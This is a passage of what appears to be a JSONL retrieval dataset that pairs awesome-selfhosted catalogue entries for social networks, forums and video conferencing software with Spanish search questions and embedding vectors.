-0.10617, 0.01811, -0.01442, -0.0384, -0.00333, 0.07032, -0.01336, -0.03483, 0.05429, -0.03253, -0.02208, 0.01492, -0.03454, -0.00728, 0.01735, 0.00324, -0.00452, 0.07273, 0.03555, -0.06569, 0.09332, 0.0109, -0.00241, -0.08283, -0.01547, -0.00628, 0.02781, -0.04887, -0.10119, 0.04478, -0.0102, -0.05273, 0.05445, 0.00691, 0.03506, 0.05445, -0.0574, -0.0206, -0.0276, -0.01021, -0.06644, -0.02641, 0.06228, -0.13006, -0.0112, -0.07386, -0.00047, 0.05379, 0.02949, -0.0086, -0.02821, -0.04482, -0.02999, 0.00526, 0.08263, 0.00459, 0.02985, 0.00521, 0.0609, 0.02448, 0.02177, 0.02108, 0.07032, -0.07362, 0.04684, -0.06363, -0.00405, -0.00704, -0.03621, 0.01563, -0.032, 0.0804, -0.02147, -0.03237, -0.02803, 0.04055, 0.03871, -0.0285, 0.00732, 0.00784, -0.01866, -0.01133, 0.04024, 0.04831, 0.02459, -0.03195, 0.00212, -0.03034, -0.0057, -0.0319, -0.02404, 0.00451, 0.007, 0.02964, -0.07491, -0.02762, 0.00259, -0.01359, 0.01934, -0.00795, 0.05977, 0.02386]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: remark42 β€” Lightweight and simple comment engine, which doesn't spy on users. It can be embedded into blogs, articles or any other place where readers add comments [MIT, Docker/Go]. Scoold β€” Stack Overflow in a JAR. An enterprise-ready Q&A platform with full-text search, SAML, LDAP integration and social login support [Apache-2.0, Java/Docker/K8S]. Simple Machines Forum β€” Free, professional grade software package that allows you to set up your own online community within minutes [BSD-3-Clause, PHP]. Socialhome β€” Federated and decentralized profile builder and social network engine [AGPL-3.0, Docker/Python]. Talkyard β€” Create a community, where your users can suggest ideas and get questions answered. And have friendly open-ended discussions and chat (Slack/StackOverflow/Discourse/Reddit/Disqus hybrid) [AGPL-3.0, Docker/Scala]. yarn.social β€” Self-Hosted, Twitterβ„’-like Decentralised micro-logging platform. No ads, no tracking, your content, your data [MIT, Go].", "indexar": "con que programa puedo montar una red social descentralizada sin anuncios?", "v": [0.03798, 0.03955, -0.13224, -0.15772, -0.06192, -0.08405, -0.05524, -0.07141, -0.16, -0.10836, -0.07381, -0.12008, 0.00625, -0.11921, 0.08953, 0.09293, -0.00734, -0.02406, 0.10875, 0.02061, 0.04642, -0.09259, -0.00246, -0.05501, 0.07602, 0.03267, 0.04128, -0.09567, -0.03479, 0.01487, 0.04244, -0.00474, 0.0572, 0.00574, 0.00405, -0.01572, 0.04877, -0.02385, -0.00334, -0.09364, -0.01272, -0.00556, -0.07822, -0.01119, -0.00749, 0.02354, 0.04621, -0.10836, -0.06639, -0.02731, -0.05991, -0.06786, -0.13739, -0.03861, -0.02038, -0.13575, -0.02577, -0.00992, -0.12896, -0.0095, 0.06082, 0.13648, -0.00494, 0.09303, 0.07687, 0.05957, 0.04284, 0.12662, -0.03457, 0.01692, 0.05355, -0.07005, 0.01037, 0.0002, 0.04068, 0.08735, -0.07954, -0.02354, 0.03568, -0.07364, -0.03776, 0.04314, 0.08431, 0.16337, 0.00015, 0.01074, 0.02737, -0.14527, -0.04177, -0.05496, 0.02641, 0.05335, 0.01124, 0.0114, 0.06717, -0.0444, 0.09766, 0.04128, -0.02279, 0.00151, -0.03858, -0.08444, -0.06922, 0.0468, 0.01072, -0.03708, 0.0859, -0.11581, 0.0994, 0.02311, 0.0332, -0.04549, -0.01122, -0.05246, -0.05386, 0.04824, -0.09783, 0.10843, 0.04605, -0.09565, -0.02975, 0.05817, 0.0066, -0.03072, 0.04774, 0.01552, 0.03067, 0.09832, -0.01668, 0.12421, 0.00031, 0.06331, 0.00803, -0.10966, -0.05145, -0.05518, -0.03881, -0.03159, 0.013, -0.04404, 0.0439, -0.00562, -0.04298, -0.1205, 0.01157, 0.07265, 0.05148, -0.12795, 0.01252, 0.09912, -0.00387, 0.09167, 0.02468, 0.01297, -0.03374, -0.0009, 0.0539, -0.01441, 0.04821, 0.08638, -0.07175, 0.02228, -0.07064, -0.04307, 0.06553, 0.02379, 0.00031, 0.02315, 0.09273, 0.02863, -0.04019, 0.07684, 0.08266, -0.04158, 0.11513, -0.02518, -0.04783, -0.10186, 0.02972, -0.03148, -0.08529, 0.05914, 0.00788, 0.00937, 0.02414, -0.04285, -0.127, 0.0228, 0.04321, -0.03668, -0.05473, -0.11488, 0.01055, 0.08234, 0.10458, -0.05125, -0.0355, 0.00925, 0.05527, -0.0592, -0.08873, 0.02506, -0.01851, 0.05055, -0.01873, 0.07077, -0.00285, 0.09551, 0.01371, 0.14606, 0.00864, -0.06426, 0.01987, -0.01867, -0.06081, -0.06715, 0.05724, -0.01857, 0.04287, 0.05977, 0.05507, 0.02991, 0.09239, 0.08011, -0.01652, -0.04337, 0.05131, 0.03767, 0.03128, 0.06736, -0.04068, -0.01869, 0.01005, 0.01845, 0.04438, 0.00439, 0.02861, 0.02159, -0.01043, -0.04428, -0.01085, 0.0922, 0.00148, 0.00315, -0.00418, -0.0405, -0.069, 0.02707, 0.0191, -0.01792, -0.00679, 0.05192, 0.01847, -0.09761, 0.03624, 0.0246]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: remark42 β€” Lightweight and simple comment engine, which doesn't spy on users. It can be embedded into blogs, articles or any other place where readers add comments [MIT, Docker/Go]. Scoold β€” Stack Overflow in a JAR. An enterprise-ready Q&A platform with full-text search, SAML, LDAP integration and social login support [Apache-2.0, Java/Docker/K8S]. Simple Machines Forum β€” Free, professional grade software package that allows you to set up your own online community within minutes [BSD-3-Clause, PHP]. Socialhome β€” Federated and decentralized profile builder and social network engine [AGPL-3.0, Docker/Python]. Talkyard β€” Create a community, where your users can suggest ideas and get questions answered. And have friendly open-ended discussions and chat (Slack/StackOverflow/Discourse/Reddit/Disqus hybrid) [AGPL-3.0, Docker/Scala]. yarn.social β€” Self-Hosted, Twitterβ„’-like Decentralised micro-logging platform. No ads, no tracking, your content, your data [MIT, Go].", "indexar": "cual es un motor de comentarios ligero para integrar en mis artΓ­culos de blog?", "v": [-0.01995, 0.11249, 0.04694, 0.02677, -0.1012, -0.16241, -0.10263, 0.07005, -0.1879, -0.07947, 0.0167, -0.08841, 0.09629, -0.0393, 0.18895, -0.02878, 0.10231, -0.11278, 0.02216, -0.06998, -0.05349, 0.04127, -0.05095, -0.05795, -0.022, -0.07444, -0.06497, 0.02754, -0.11261, 0.01376, -0.09016, -0.01241, 0.03972, 0.03125, -0.04907, -0.02042, 0.12525, 0.09248, 0.04343, 0.10253, -0.07242, -0.09172, -0.09778, -0.03552, -0.00829, -0.08594, 0.10962, -0.00137, 0.00165, -0.04983, 0.07572, 0.06395, 0.08158, 0.05223, 0.01476, 0.05084, 0.0413, -0.13727, 0.00395, -0.02834, -0.02258, 0.1761, -0.04204, -0.04119, -0.18041, -0.11192, -0.01436, -0.04354, -0.01371, 0.0489, -0.02044, 0.01189, 0.0461, -0.16785, -0.02417, 0.04255, -0.01084, 0.05978, 0.00499, 0.16335, 0.09449, -0.07885, -0.02967, 0.09045, 0.04717, -0.01431, 0.12204, -0.11113, -0.00634, 0.0177, 0.05919, -0.0003, -0.07391, 0.00289, -0.10423, 0.1349, 0.03536, 0.01409, 0.03109, -0.02997, 0.01704, -0.01582, 0.00695, 0.04276, 0.03908, 0.04158, 0.08629, 0.0038, 0.06554, -0.09263, 0.07856, 0.0501, -0.05945, -0.01487, -0.02314, 0.10062, -0.06689, -0.03541, -0.0111, -0.12238, -0.08946, 0.07485, -0.08837, -0.07388, 0.10477, 0.01878, 0.06765, 0.01115, -0.05645, -0.03873, 0.01657, 0.01357, 0.02594, -0.01151, 0.03353, -0.00865, 0.0821, 0.00595, -0.05654, -0.01375, 0.09164, -0.0502, -0.01305, 0.01651, 0.00186, 0.07139, -0.02901, 0.02313, -0.05214, -0.0512, -0.03957, 0.035, 0.04467, -0.03845, -0.02658, -0.07166, 0.00233, -0.02509, -0.03855, 0.0417, -0.08193, 0.02109, 0.07203, 0.00252, 0.05508, -0.01682, -0.04261, 0.00664, -0.04402, 0.00913, 0.0064, 0.01428, -0.03643, 0.05738, 0.05883, 0.10164, -0.09269, 0.00419, 0.01237, 0.09947, -0.05409, 0.069, -0.09204, 0.06902, 0.0257, 0.05841, 0.05439, 0.0463, -0.01983, 0.02757, -0.02048, -0.11206, -0.05749, 0.0165, 0.02485, 0.03313, -0.05748, -0.08024, 0.05068, -0.04046, -0.06566, -0.01007, -0.02475, 0.01183, -0.07884, -0.04388, -0.00588, -0.03982, -0.04066, 0.06725, 0.01245, -0.03834, -0.03625, 0.01577, 0.02264, 0.01469, -0.02231, 0.04914, 0.01865, 0.06269, 0.07733, -0.02335, 0.00191, 0.06612, -0.02937, 0.02997, -0.0834, 0.03268, 0.01259, 0.00412, -0.08893, -0.01374, -0.08058, -0.03385, -0.0316, 0.03594, 0.00708, 0.03867, -0.02687, -2e-05, 0.01779, 0.00551, 0.08546, -0.05354, 0.01163, 0.00501, 0.00649, 0.00549, -0.02683, -0.05362, 0.01971, -0.00846, 0.04281, -0.05763, 0.06487, 0.02633]} +{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: BigBlueButton β€” Supports real-time sharing of audio, video, slides (with whiteboard controls), chat, and the screen. Instructors can engage remote students with polling, emojis, and breakout rooms [LGPL-3.0, Java]. Galene β€” Video conferencing server that is easy to deploy and that requires moderate server resources [MIT, Go]. Janus β€” General-purpose, lightweight, minimalist WebRTC Server [GPL-3.0, C]. Jitsi Meet β€” WebRTC application that uses Jitsi Videobridge to provide high quality, scalable video conferences [Apache-2.0, Nodejs/Docker/deb]. Jitsi Video Bridge β€” WebRTC compatible Selective Forwarding Unit (SFU) that allows for multiuser video communication [Apache-2.0, Java/deb]. MiroTalk C2C β€” Real-time cam-2-cam video calls & screen sharing, end-to-end encrypted, to embed in any website with a simple iframe [AGPL-3.0, Nodejs/Docker]. MiroTalk P2P β€” Simple, secure, fast real-time video conferences up to 4k and 60fps, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker].", "indexar": "que programas para videollamada soportan compartir pantalla y pizarra en tiempo real?", "v": [0.1509, -0.00627, -0.23761, -0.06419, -0.04224, -0.12825, 0.06973, -0.16372, 0.06652, -0.16973, 0.14288, -0.08577, 0.08679, -0.06645, -0.03277, 0.06975, 0.07236, -0.01254, 0.06546, -0.08313, 0.03443, 0.00904, -0.1032, -0.09808, -0.01869, 0.00901, 0.07482, 0.02102, -0.03855, -0.07739, 0.00094, 0.0367, 0.09601, -0.05016, -0.03514, -0.06198, 0.04565, -0.01211, -0.06644, 0.0163, 0.03095, 0.20392, 0.05283, -0.06592, 0.0313, -0.01996, 0.06124, 0.03312, -0.11907, -0.00447, -0.13272, 0.04808, 0.01737, 0.05018, -0.04731, -0.21985, 0.16032, -0.14063, 0.07647, -0.00214, -0.01113, -0.04658, -0.00663, 0.0009, -0.0352, 0.02104, 0.02304, 0.05921, -0.09017, -0.00147, -0.13833, -0.0165, 0.05886, -0.04743, -0.01054, -0.01859, -0.1259, -0.0168, -0.02298, -0.03764, 0.01186, -0.07577, 0.01474, 0.08764, -0.10493, -0.04636, 0.00626, -0.08817, -0.02876, -0.05327, 0.0195, 0.13806, 0.02078, 0.05184, 0.054, -0.04849, 0.08801, -0.01841, 0.02157, 0.04066, 0.11864, -0.10747, -0.10741, 0.02, -0.0345, 0.15947, 0.0076, -0.12974, -0.02, -0.04285, 0.06475, 0.03837, -0.04809, 0.01777, -0.02683, -0.00433, -0.02359, -0.01989, -0.01865, -0.0329, 0.03498, 0.0042, -0.04778, -0.04194, 0.0562, 0.02589, -0.03194, 0.04434, -0.06904, 0.06534, -0.01532, -0.01731, -0.02176, -0.01878, -0.0121, -0.07705, 0.04419, 0.06808, 0.05306, -0.10412, 0.09843, 0.07657, 0.003, -0.04578, 0.04262, 0.0101, -0.00134, -0.05048, -0.05953, 0.07085, 0.08386, 0.03485, 0.0231, -0.00823, 0.01686, 0.024, 0.03199, 0.0263, -0.081, 0.03137, 0.03483, -0.00057, -0.0788, -0.08415, -0.02076, -0.01821, -0.03811, 0.06946, 0.05332, 0.0648, 0.01938, 0.07457, 0.02885, -0.02798, -0.06334, 0.00239, 0.02664, -0.01537, -0.02318, -0.0972, -0.05527, 0.05553, 0.06749, 0.08074, 0.00024, -0.04319, -0.0318, -0.02249, -0.03174, 0.00916, 0.03111, -0.0213, -0.01411, 0.06724, -0.04662, -0.09184, -0.05188, -0.01504, 0.04536, -0.0387, -0.01568, -0.05437, 0.00154, 0.01372, -0.01334, 0.04398, -0.0391, 0.08176, 0.04834, 0.03826, -0.00898, 0.00834, 0.01832, -0.01579, -0.04468, -0.01572, 0.096, 0.04294, 0.02146, -0.03431, 0.03906, -0.01888, 0.03579, -0.00469, -0.01667, 0.00213, 0.03702, 0.07402, -0.05393, -0.05928, -0.02706, -0.01711, 0.02177, -0.0413, 0.02266, -0.00626, -0.01653, -0.05776, -0.03302, -0.0143, -0.00291, 0.02696, -0.02671, -0.02807, -0.02891, -0.0258, -0.08056, 0.00682, 0.06065, -0.09415, -0.02986, 0.02442, 0.04104, 0.04334, -0.05162, 0.03633]} +{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: BigBlueButton β€” Supports real-time sharing of audio, video, slides (with whiteboard controls), chat, and the screen. Instructors can engage remote students with polling, emojis, and breakout rooms [LGPL-3.0, Java]. Galene β€” Video conferencing server that is easy to deploy and that requires moderate server resources [MIT, Go]. Janus β€” General-purpose, lightweight, minimalist WebRTC Server [GPL-3.0, C]. Jitsi Meet β€” WebRTC application that uses Jitsi Videobridge to provide high quality, scalable video conferences [Apache-2.0, Nodejs/Docker/deb]. Jitsi Video Bridge β€” WebRTC compatible Selective Forwarding Unit (SFU) that allows for multiuser video communication [Apache-2.0, Java/deb]. MiroTalk C2C β€” Real-time cam-2-cam video calls & screen sharing, end-to-end encrypted, to embed in any website with a simple iframe [AGPL-3.0, Nodejs/Docker]. MiroTalk P2P β€” Simple, secure, fast real-time video conferences up to 4k and 60fps, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker].", "indexar": "con que puedo montar conferencias de video escalables sin usar servidores externos?", "v": [0.12107, -0.01351, -0.19258, -0.17011, -0.12748, -0.04327, -0.0296, -0.07477, -0.00313, -0.17125, -0.1512, -0.02371, -0.02017, -0.04614, 0.07231, 0.0978, 0.11351, -0.06148, 0.07408, 0.01789, 0.06479, -0.02284, -0.02133, -0.04193, -0.02221, 0.14082, -0.03474, -0.13824, -0.06098, -0.06372, 0.03529, 0.0751, 0.01011, -0.03165, 0.04947, -0.05134, -0.08357, 0.08553, -0.06935, 0.02018, -0.04706, 0.06941, -0.10758, -0.07869, 0.05861, -0.08228, -0.02779, -0.02586, -0.11675, 0.01755, -0.00894, -0.0073, -0.07915, -0.01212, -0.11003, -0.13106, 0.08253, -0.02311, 0.03813, 0.00926, -0.04648, 0.08729, 0.00463, 0.0715, 0.03299, -0.02968, -0.05995, 0.02205, -0.13841, -0.03109, -0.21563, -0.09408, 0.07914, -0.01378, 0.0388, 0.11313, -0.1013, -0.03272, 0.02261, 0.13921, -0.03606, 0.00313, -0.00155, 0.11738, -0.12601, -0.04362, 0.01514, -0.02879, 0.02733, 0.01112, 0.03112, 0.09357, 0.07246, -0.10316, -0.02869, -0.08568, 0.09812, 0.08464, -0.00193, -0.00186, 0.00307, 0.07298, 0.03338, 0.09799, 0.04114, 0.08546, 0.08628, -0.14531, 0.01439, -0.10492, 0.07222, 0.04959, -0.1418, 0.00889, -0.0733, -0.12993, 0.00728, -0.05419, -0.05753, 0.02699, 0.02504, 0.00762, 0.0656, 0.02375, -0.03388, -0.0546, -0.0123, 0.02742, -0.04094, -0.0309, 0.0538, -0.08297, -0.05002, -0.07131, 0.04544, -0.01984, 0.0945, -0.04955, -0.02046, -0.05501, 0.04763, 0.05545, -0.00433, -0.05396, 0.03626, 0.02571, 0.09665, -0.08276, -0.05516, -0.01539, 0.05262, 0.06488, -0.03844, 0.02571, -0.04655, -0.12608, -0.00514, -0.04624, -0.07514, 0.07751, -0.00079, 0.02598, 0.01284, 0.04251, 0.02553, 0.01472, -0.01288, 0.05917, -0.00768, 0.05929, 0.01345, 0.04523, 0.03048, -0.04693, -0.00884, -0.00913, -0.05545, -0.03221, -0.01054, -0.02534, -0.03012, 0.01935, -0.04821, 0.00317, -0.03318, -0.00529, 0.02762, 0.02326, -0.03706, 0.00142, -0.01476, 0.0469, 0.00026, 0.02917, 0.03613, -0.09543, -0.05235, -0.0479, 0.02296, -0.01232, 0.00292, -0.03066, -0.0403, -0.01477, 0.04018, -0.01521, -0.05923, 0.09484, 0.01297, 0.06745, 0.02044, 0.01416, 0.06459, -0.05769, 0.03354, -0.01712, 0.02833, 0.03861, -0.04761, 0.0639, 0.04437, 0.02158, 0.04327, -0.01427, 0.01361, 0.08997, -0.03056, -0.01325, -0.03487, -0.00269, -0.03572, 0.03396, -0.02873, 0.00012, -0.0081, 0.01238, 0.04514, 0.03453, -0.0194, -0.06018, -0.04546, 0.04681, -0.02392, -0.05032, -0.00063, -0.08922, -0.07231, 0.04112, 0.00607, -0.04557, 0.03217, 0.02666, 0.01546, -0.00569, -0.06374, 0.01889]} +{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: BigBlueButton β€” Supports real-time sharing of audio, video, slides (with whiteboard controls), chat, and the screen. Instructors can engage remote students with polling, emojis, and breakout rooms [LGPL-3.0, Java]. Galene β€” Video conferencing server that is easy to deploy and that requires moderate server resources [MIT, Go]. Janus β€” General-purpose, lightweight, minimalist WebRTC Server [GPL-3.0, C]. Jitsi Meet β€” WebRTC application that uses Jitsi Videobridge to provide high quality, scalable video conferences [Apache-2.0, Nodejs/Docker/deb]. Jitsi Video Bridge β€” WebRTC compatible Selective Forwarding Unit (SFU) that allows for multiuser video communication [Apache-2.0, Java/deb]. MiroTalk C2C β€” Real-time cam-2-cam video calls & screen sharing, end-to-end encrypted, to embed in any website with a simple iframe [AGPL-3.0, Nodejs/Docker]. MiroTalk P2P β€” Simple, secure, fast real-time video conferences up to 4k and 60fps, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker].", "indexar": "cual es una alternativa libre a Zoom para reuniones con salas de breakout?", "v": [0.08352, 0.04656, -0.15564, 0.01177, -0.13119, -0.11409, -0.08754, -0.10789, -0.04132, -0.06831, -0.12152, -0.17134, 0.05261, 0.00523, 0.05818, 0.00066, 0.0213, 0.07175, 0.02242, 0.01973, 0.04492, 0.05334, -0.07497, -0.04885, -0.0159, -0.09885, 0.00663, -0.02876, -0.0375, 0.01378, 0.04476, -0.09092, 0.07221, -0.05495, 0.10309, -0.04372, 0.12909, 0.04158, 0.05347, -0.05813, -0.15274, 0.00342, -0.06677, 0.00288, 0.04466, -0.05314, -0.14522, 0.06224, -0.02989, -0.02259, -0.13272, 0.07558, -0.02457, 0.04471, 0.07978, -0.09019, 0.04233, -0.00491, -0.12511, -0.02449, -0.04713, -0.06763, 0.06161, -0.05455, 0.01876, 0.02629, -0.07566, 0.03379, 0.03063, 0.11063, -0.01007, -0.08918, 0.02747, -0.08044, -0.05027, 0.04141, -0.04883, 0.00686, -0.11059, 0.06527, 0.11585, -0.08536, -0.04899, 0.0581, -0.12926, -0.15536, 0.08336, -0.11713, -0.02632, 0.06963, 0.07457, 0.03143, -0.08997, -0.00887, -0.02592, -0.11153, 0.02778, 0.09177, -0.01856, 0.04507, 0.02665, 0.06771, -0.14285, 0.04521, -0.06126, -0.05454, -0.03912, 0.01568, -0.11078, -0.01798, -0.01243, 0.09173, -0.01859, -0.04243, 0.02403, -0.08292, 0.00967, 0.0056, 0.04199, -0.03947, -0.01186, -0.01369, -0.08625, -0.15022, -0.0694, 0.01114, 0.01455, 0.03084, 0.01976, 0.06489, 0.04568, -0.0273, -0.0176, -0.03278, -0.06429, -0.01256, 0.10902, -0.04706, -0.00404, -0.07103, 0.01838, -0.0391, 0.09424, -0.03024, 0.09155, -0.01833, -0.02249, 0.02382, -0.01684, -0.05856, -0.03307, 0.13528, 0.04893, 0.03591, -0.08293, 0.02606, -0.10828, -0.00818, -0.03984, 0.11798, 0.0093, -0.0264, 0.02021, 0.00669, 0.01972, -0.02919, -0.07, -0.01034, -0.0534, 0.0311, 0.02371, 0.06626, 0.03442, -0.07008, -0.04167, 0.00287, 0.00094, -0.07879, -0.00888, -0.0623, 0.0273, 0.09171, -0.05241, -0.05552, -0.03378, -0.01167, 0.03481, 0.02209, 0.06437, -0.04292, -0.01885, 0.04309, -0.06322, -0.10187, 0.02027, -0.01788, -0.01069, -0.07366, 0.07608, -0.04228, -0.05164, 0.01799, -0.08208, -0.07319, 0.02419, 0.01764, -0.14731, 0.01027, -0.02334, 0.04234, 0.05184, 0.0476, 0.0972, 0.00441, -0.11261, 0.0307, 0.01068, -0.00999, 0.00876, -0.04583, 0.06731, 0.05428, 0.02767, -0.03275, 0.01856, 0.05203, 0.03707, -0.02944, -0.03481, 0.0683, -0.00737, 0.03477, 0.03063, 0.00684, 0.04916, 0.01391, 0.01518, 0.02273, -0.00138, -0.05529, 0.012, 0.01758, -0.04185, 0.0022, -0.03877, -0.00632, -0.13271, 0.0202, -0.02158, -0.10917, -0.03617, 0.04574, 0.03057, 0.00375, -0.00147, -0.0102]} +{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: MiroTalk SFU β€” Simple, secure, scalable real-time video conferences up to 4k, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker]. plugNmeet β€” Scalable and high performance web conferencing system [MIT, Docker/Go].", "indexar": "que programa es bueno para videollamadas en tiempo real y seguro", "v": [0.02327, -0.0394, -0.1766, 0.11104, -0.02678, -0.09568, 0.00983, -0.12207, 0.03714, -0.18893, 0.0901, -0.19425, 0.0607, -0.03577, -0.01961, 0.10117, 0.06757, -0.08664, 0.07456, -0.02208, 0.15539, -0.06504, -0.09947, -0.04938, -0.00197, -0.0244, 0.073, 0.05071, -0.02405, 0.00491, 0.08093, 0.04694, 0.11678, -0.12699, -0.01328, -0.00146, 0.0793, 0.02307, -0.0189, 0.087, 0.0084, 0.08789, 0.02766, -0.09438, 0.02066, -0.06228, 0.10034, -0.03147, -0.09021, -0.07453, -0.03993, 0.04336, -0.00257, -0.05289, 0.03119, -0.16458, 0.0705, -0.12849, -0.03128, -0.01531, -0.02328, -0.05515, 0.03024, 0.0049, -0.00386, 0.00687, 0.11553, 0.04135, -0.02354, -0.05182, -0.15591, -0.07946, 0.04872, -0.00494, -0.07876, -0.05556, -0.08834, 0.01407, -0.07062, -0.01191, -0.06801, -0.02052, 0.07647, 0.11098, -0.13151, -0.00386, -0.02135, -0.06989, -0.05084, -0.04522, 0.03722, 0.1428, 0.05882, 0.08109, 0.0247, -0.05114, 0.12695, 0.00522, 0.00026, 0.01771, 0.09081, -0.09493, -0.09603, 0.07318, -0.00301, 0.13829, 0.07614, 0.01304, -0.03974, -0.01445, 0.00995, 0.06845, -0.06402, -0.04461, 0.00597, 0.06287, -0.03371, -0.04304, 0.05011, -0.07711, 0.00765, 0.04028, -0.0661, -0.01413, 0.05916, 0.03179, -0.1117, 0.03529, -0.05882, 0.0658, -0.0009, -0.04585, -0.08442, -0.04762, -0.00151, -0.08145, 0.00835, 0.04578, 0.03578, -0.06383, 0.07567, 0.08941, 0.00144, -0.01657, 0.03861, 0.00575, -0.02866, -0.03911, -0.054, 0.07857, 0.05106, 0.06043, -0.01554, 0.03083, 0.02188, 0.04393, 0.04413, -0.05769, -0.0668, 0.04618, 0.04686, 0.03585, -0.01334, -0.12498, 0.02779, -0.03865, 0.03865, 0.04846, 0.00748, 0.02613, 0.07469, 0.05409, 0.06744, -0.05893, -0.03387, 0.03277, 0.01139, -0.03978, 0.03382, -0.09054, -0.06705, 0.03974, 0.0775, 0.07208, 0.00966, -0.06654, 0.00309, 0.04437, -0.02049, 0.01417, 0.01339, -0.11402, 0.00346, 0.09865, -0.03771, -0.07883, -0.0264, -0.0829, -0.01933, -0.04604, -0.06243, -0.06927, 0.00287, -0.00552, -0.00102, 0.05944, -0.00528, 0.04631, 0.07529, 0.09126, 0.0295, -0.00097, 0.02979, 0.0044, 0.02473, -0.02785, 0.06069, 0.06595, -0.03289, 0.02628, 0.04362, -0.02234, 0.03774, 0.05938, -0.08903, -0.01446, 0.03071, 0.06198, -0.028, -0.04104, -0.0543, -0.06484, -0.0127, -0.06408, 0.03696, 0.03907, 0.01823, -0.01848, -0.06712, -0.05653, 0.03049, 0.07964, -0.01945, -0.00767, -0.03384, -0.01417, -0.09393, 0.01743, 0.04498, -0.07351, -0.00169, -0.01627, 0.00485, 0.01479, 0.00032, 0.0151]} +{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: MiroTalk SFU β€” Simple, secure, scalable real-time video conferences up to 4k, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker]. plugNmeet β€” Scalable and high performance web conferencing system [MIT, Docker/Go].", "indexar": "cual herramienta sirve para montar reuniones de video escalables sin instalar nada pesado", "v": [-0.02563, 0.04218, -0.3094, -0.22541, -0.11299, -0.12042, -0.06534, -0.07951, -0.06587, -0.16497, -0.11786, -0.05341, 0.01435, -0.06736, 0.10813, 0.07787, 0.02837, -0.10353, 0.06449, -0.00503, -0.02085, -0.01494, -0.07122, -0.04749, -0.06752, 0.11046, -0.00548, -0.06831, -0.22216, -0.07181, 0.07488, 0.05558, 0.00019, -0.05098, -0.05438, -0.09025, -0.02402, -0.02776, -0.04039, 0.00345, -0.06593, 0.08252, -0.06449, -0.01832, 0.03518, -0.07725, 0.03538, 0.00301, -0.03948, 0.06095, 0.05047, -0.00245, -0.02735, -0.06722, -0.03548, -0.16555, 0.2007, -0.09682, 0.081, -0.0586, -0.10507, 0.03033, -0.05586, 0.01009, -0.02186, 0.02073, -0.05042, 0.03445, -0.09496, -0.00114, -0.11867, -0.03702, 0.11204, -0.00649, -0.00988, 0.0558, 0.0259, 0.05475, -0.02738, 0.04525, 0.12803, -0.08492, -0.04323, 0.07007, -0.09669, -0.09366, 0.05895, -0.02194, 0.0537, -0.00535, 0.00403, 0.04894, -0.00031, -0.05544, 0.08518, -0.12352, 0.10775, 0.10015, 0.02664, 0.0285, 0.03464, -0.04786, -0.00428, 0.10021, 0.00813, 0.00906, -0.02543, -0.03141, -0.02612, -0.09289, 0.15525, 0.13375, -0.0288, 0.0334, -0.0204, -0.03119, -0.01671, -0.03385, -0.09579, -0.04661, 0.01607, 0.06593, -0.04386, 0.04268, -0.02312, -0.0457, 0.02287, 0.07644, -0.0317, 0.03375, 0.0463, -0.10243, -0.0101, -7e-05, -0.00824, -0.07741, 0.04646, -0.0675, -0.03715, -0.05932, 0.06527, 0.05872, -0.0263, -0.10183, 0.03815, 0.07062, 0.0461, -0.02721, -0.02853, 0.05122, 0.10517, 0.06767, -0.00031, 0.01372, -0.01194, -0.07152, -0.00029, 0.02034, -0.05064, 0.01225, -0.00228, -0.00221, 0.03055, -0.01567, 0.0092, -0.00331, -0.07167, 0.05462, 0.06591, 0.03362, 0.04592, -0.00915, 0.06053, -0.0189, 0.00751, -0.0166, -0.00502, -0.00852, 0.00971, -0.06051, -0.05333, 0.04707, 0.02562, 0.04122, 0.01946, -0.03758, 0.01364, -0.01182, -0.03631, 0.02021, -0.00926, 0.02731, -0.05173, -0.0773, 0.04964, -0.03605, -0.02517, -0.08619, 0.03446, 0.01918, -0.00484, -0.05783, -0.07111, 0.00146, 0.05259, 0.01417, -0.02336, 0.01949, 0.04524, 0.07343, 0.03211, 0.02782, -0.00849, -0.02493, 0.03181, -0.03157, 0.02791, 0.03395, -0.04766, 0.05784, -0.00475, -0.00298, 0.06553, -0.01124, -0.02593, 0.03553, 0.02171, 0.01831, -0.03194, -0.01896, -0.03214, 0.00871, -0.00737, 0.01038, 0.02086, -0.01699, 0.05866, 0.05406, 